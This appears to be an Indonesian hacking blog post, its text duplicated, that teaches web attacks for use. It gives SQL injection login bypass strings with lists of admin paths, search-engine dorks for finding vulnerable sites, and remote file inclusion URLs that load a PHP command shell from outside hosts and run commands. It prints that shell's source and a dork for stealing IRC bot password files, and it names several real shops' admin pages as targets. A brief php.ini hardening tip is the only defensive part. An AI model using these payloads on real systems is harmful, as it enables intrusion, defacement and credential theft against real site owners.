13 years ago
SQL Injection for admin
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp" "/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp" "/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
“root/login.asp” “admin/index.asp” login With :
Community ID:´or´´=´
Password:´or´´=´ Bugs File : admin page --> /admin Display : http://target.com/s-cart/admin 1. search in all search engine e.g --> allinurl:s-cart/
index.phtml or "s-cart" 2. Get the target site like --> http://www.target.com/
s-cart/index.phtml 3. and now go to admin page with change the Url to : http://www.target.com/s-cart/admin --> auto open
browser with login and passwd !!! login : admin
passwd : ´or´´=´ 4. If U are lucky, u can see the admin manager, show
the table Order now or Deface s-cart page.
Ok let´s to try
~ secure php how to secure php 1. open php.ini (find your selt were is the place)
2. find part safe_mode (default valiu is off), turn to =on
3. log off the danger fungsion like passthru, system.
exec.
with fungsion name to the disable_function=
4. teh easy way n more secure --> use normal html ,not php
5. wacth out permission direktori and file, note
this fungsion is better be off: 1. passthru, system, exec, myshellexec <-- php
command shell
2. fopen <-- can executed remote file
3. fwrite, fputs <-- to write file
4. phpinfo <-- data with php Hacking konsep : http://[VICTIM]/mail_autocheck.php?pm_path=http://
www.webloe.com/phpinjection.txt?&cmd=id web target you can find in the search engine like
google.
sample we can use keyword inurl atau allinurl: allinurl:/mail_autocheck.php?pm_path=*.* sample script php injection you can upload to your
website ------------------END HERE--------------------------- ######################################
########
My_eGallery security exploit Author : scariot shall live for ever
######################################
######## Bugs File may be : displayCategory.php Display : http://www.target.com/modules/My_
eGallery/public/displayCategory.php Note : for attacking u must use this script, save and upload to
your website.
e.g save with namefile : cmd.txt
e.g from my site : http://www.geocities.com/seng_
due/script/solohackerlink.txt ---------------- script from here
----------------------------------------------------- SCARIOT - WAS HERE !!! TEST YOUR SERVER !!! Image # saleho PHP : # Released by : LALIEUR INC // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); system("$ cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"
; $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_ replace("<", "<", $output)); ?> scariot shall live for ever ------------------ End of Script --------------------------------------------------------- ################################### Ok and now let´s Search your Target ################################### 1. search in all search engine e.g --> "allinurl:displayCategory.php" or "My_eGallery" 2. Get the target site like --> http://www.target.com/ modules/My_eGallery/public/displayCategory.php 3. test to attack with code : ?basepath=http://if-istp.net/cmd.txt?&cmd=uname - a;id; 4. Display attacking : http://www.target.com/modules/My_eGallery/ public/displayCategory.php?basepath=http://if- istp.net/cmd.txt?&cmd=uname -a;id; 5. Linux and Unix command Used in here ~ e.g : ls - al , uname -r , cat , echo , etc.... steal password/user eggdrop IRC bot clik here for google searchklik [link]http:// www.google.com/search? &ie=UTF-8&oe=UTF-8&q=eggdrop+filetype%3Auser +user[/link] injek aja pake ini boz kekekeke User Name : "=" Password : "=" aneh digishop, ko mau yah sql injection kali udah basi juga http://www.returnsforsale.com/secure/admin/ ups.php https://tunedinwebsales.com/secure/babicz/ admin/ https://www.bswatch.com/secure/admin/ index.php http://www.securityzonepr.com/digiSHOP/secure/ admin/index.php https://www.tangerineclothing.com/admin/ index.php https://www.facesbyfelicia.com/store/admin/ index.php Google Inject Again Keyword: allinurl: uptime3?pin= Dec Hex Code Dec Hex Code Dec Hex Code Dec Hex Code 0 00 NUL 32 20 space 64 40 @ 96 60 ` 1 01 SOH 33 21 ! 65 41 A 97 61 a 2 02 STX 34 22 " 66 42 B 98 62 b
3 03 ETX 35 23 # 67 43 C 99 63 c 4 04 EOT 36 24 & 68 44 D 100 64 d 5 05 ENQ 37 25 % 69 45 E 101 65 e 6 06 ACK 38 26 $ 70 46 F 102 66 f 7 07 BEL 39 27 ‘ 71 47 G 103 67 g 8 08 BS 40 28 ( 72 48 H 104 68 h 9 09 HT 41 29 ) 73 49 I 105 69 i 10 0A LF 42 2A * 74 4A J 106 6A j 11 0B VT 43 2B + 75 4B K 107 6B k 12 0C FF 44 2C , 76 4C L 108 6C l 13 0D CR 45 2D - 77 4D M 109 6D m 14 0E SO 46 2E . 78 4E N 110 6E n
15 0F SI 47 2F / 79 4F O 111 6F o 16 10 DLE 48 30 0 80 50 P 112 70 p 17 11 DC1 49 31 1 81 51 Q 113 71 q 18 12 DC2 50 32 2 82 52 R 114 72 r
19 13 DC3 51 33 3 83 53 S 115 73 s 20 14 DC4 52 34 4 84 54 T 116 74 t 21 15 NAK 53 35 5 85 55 U 117 75 u 22 16 SYN 54 36 6 86 56 V 118 76 v 23 17 ETB 55 37 7 87 57 W 119 77 w 24 18 CAN 56 38 8 88 58 X 140 78 x 25 19 EM 57 39 9 89 59 Y 121 79 y 26 1A SUB 58 3A : 90 5A Z 122 7A z 27 1B ESC 59 3B ; 91 5B [ 123 7B { 28 1C FS 60 3C < 92 5C 124 7C | 29 1D GS 61 3D = 93 5D ] 125 7D }
30 1E RS 62 3E > 94 5E ^ 126 7E ~ 31 1F US 63 3F ? 95 5F _ 127 7F DEL
Hanya Ini yang dapat Saya Berikan, TQ
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp" "/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp" "/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
“root/login.asp” “admin/index.asp” login With :
Community ID:´or´´=´
Password:´or´´=´ Bugs File : admin page --> /admin Display : http://target.com/s-cart/admin 1. search in all search engine e.g --> allinurl:s-cart/
index.phtml or "s-cart" 2. Get the target site like --> http://www.target.com/
s-cart/index.phtml 3. and now go to admin page with change the Url to : http://www.target.com/s-cart/admin --> auto open
browser with login and passwd !!! login : admin
passwd : ´or´´=´ 4. If U are lucky, u can see the admin manager, show
the table Order now or Deface s-cart page.
Ok let´s to try
~ secure php how to secure php 1. open php.ini (find your selt were is the place)2. find part safe_mode (default valiu is off), turn to =on
3. log off the danger fungsion like passthru, system.
exec.
with fungsion name to the disable_function=
4. teh easy way n more secure --> use normal html ,not php
5. wacth out permission direktori and file, note
this fungsion is better be off: 1. passthru, system, exec, myshellexec <-- php
command shell
2. fopen <-- can executed remote file
3. fwrite, fputs <-- to write file
4. phpinfo <-- data with php Hacking konsep : http://[VICTIM]/mail_autocheck.php?pm_path=http://
www.webloe.com/phpinjection.txt?&cmd=id web target you can find in the search engine like
google.
sample we can use keyword inurl atau allinurl: allinurl:/mail_autocheck.php?pm_path=*.* sample script php injection you can upload to your
website ------------------END HERE--------------------------- ######################################
########
My_eGallery security exploit Author : scariot shall live for ever
######################################
######## Bugs File may be : displayCategory.php Display : http://www.target.com/modules/My_
eGallery/public/displayCategory.php Note : for attacking u must use this script, save and upload to
your website.
e.g save with namefile : cmd.txt
e.g from my site : http://www.geocities.com/seng_
due/script/solohackerlink.txt ---------------- script from here
----------------------------------------------------- SCARIOT - WAS HERE !!! TEST YOUR SERVER !!! Image # saleho PHP : # Released by : LALIEUR INC // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); system("$ cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"
; $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_ replace("<", "<", $output)); ?> scariot shall live for ever ------------------ End of Script --------------------------------------------------------- ################################### Ok and now let´s Search your Target ################################### 1. search in all search engine e.g --> "allinurl:displayCategory.php" or "My_eGallery" 2. Get the target site like --> http://www.target.com/ modules/My_eGallery/public/displayCategory.php 3. test to attack with code : ?basepath=http://if-istp.net/cmd.txt?&cmd=uname - a;id; 4. Display attacking : http://www.target.com/modules/My_eGallery/ public/displayCategory.php?basepath=http://if- istp.net/cmd.txt?&cmd=uname -a;id; 5. Linux and Unix command Used in here ~ e.g : ls - al , uname -r , cat , echo , etc.... steal password/user eggdrop IRC bot clik here for google searchklik [link]http:// www.google.com/search? &ie=UTF-8&oe=UTF-8&q=eggdrop+filetype%3Auser +user[/link] injek aja pake ini boz kekekeke User Name : "=" Password : "=" aneh digishop, ko mau yah sql injection kali udah basi juga http://www.returnsforsale.com/secure/admin/ ups.php https://tunedinwebsales.com/secure/babicz/ admin/ https://www.bswatch.com/secure/admin/ index.php http://www.securityzonepr.com/digiSHOP/secure/ admin/index.php https://www.tangerineclothing.com/admin/ index.php https://www.facesbyfelicia.com/store/admin/ index.php Google Inject Again Keyword: allinurl: uptime3?pin= Dec Hex Code Dec Hex Code Dec Hex Code Dec Hex Code 0 00 NUL 32 20 space 64 40 @ 96 60 ` 1 01 SOH 33 21 ! 65 41 A 97 61 a 2 02 STX 34 22 " 66 42 B 98 62 b3 03 ETX 35 23 # 67 43 C 99 63 c 4 04 EOT 36 24 & 68 44 D 100 64 d 5 05 ENQ 37 25 % 69 45 E 101 65 e 6 06 ACK 38 26 $ 70 46 F 102 66 f 7 07 BEL 39 27 ‘ 71 47 G 103 67 g 8 08 BS 40 28 ( 72 48 H 104 68 h 9 09 HT 41 29 ) 73 49 I 105 69 i 10 0A LF 42 2A * 74 4A J 106 6A j 11 0B VT 43 2B + 75 4B K 107 6B k 12 0C FF 44 2C , 76 4C L 108 6C l 13 0D CR 45 2D - 77 4D M 109 6D m 14 0E SO 46 2E . 78 4E N 110 6E n
15 0F SI 47 2F / 79 4F O 111 6F o 16 10 DLE 48 30 0 80 50 P 112 70 p 17 11 DC1 49 31 1 81 51 Q 113 71 q 18 12 DC2 50 32 2 82 52 R 114 72 r
19 13 DC3 51 33 3 83 53 S 115 73 s 20 14 DC4 52 34 4 84 54 T 116 74 t 21 15 NAK 53 35 5 85 55 U 117 75 u 22 16 SYN 54 36 6 86 56 V 118 76 v 23 17 ETB 55 37 7 87 57 W 119 77 w 24 18 CAN 56 38 8 88 58 X 140 78 x 25 19 EM 57 39 9 89 59 Y 121 79 y 26 1A SUB 58 3A : 90 5A Z 122 7A z 27 1B ESC 59 3B ; 91 5B [ 123 7B { 28 1C FS 60 3C < 92 5C 124 7C | 29 1D GS 61 3D = 93 5D ] 125 7D }
30 1E RS 62 3E > 94 5E ^ 126 7E ~ 31 1F US 63 3F ? 95 5F _ 127 7F DEL
Hanya Ini yang dapat Saya Berikan, TQ
![ResEdit v1.6.3 32bit[x86] And 64bit[x64] Free Download](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRS1UXSD3DxzwGKHwVhDuEhsMmxG0rW1CpHEgwZpcQr1TC9C3vUIwywuHrw-dE8K2S35VUqNWqI0cXptRVnXPl2VB9EuBxCiYvJ2m31xqIzRKyiLrHh69R3XyDo_QUDwYtPjndmuIU6Qw/s415/PH+-+Res+Edit+1.6.3+-+PalmaHutabarat.jpg)
Tidak ada komentar
Posting Komentar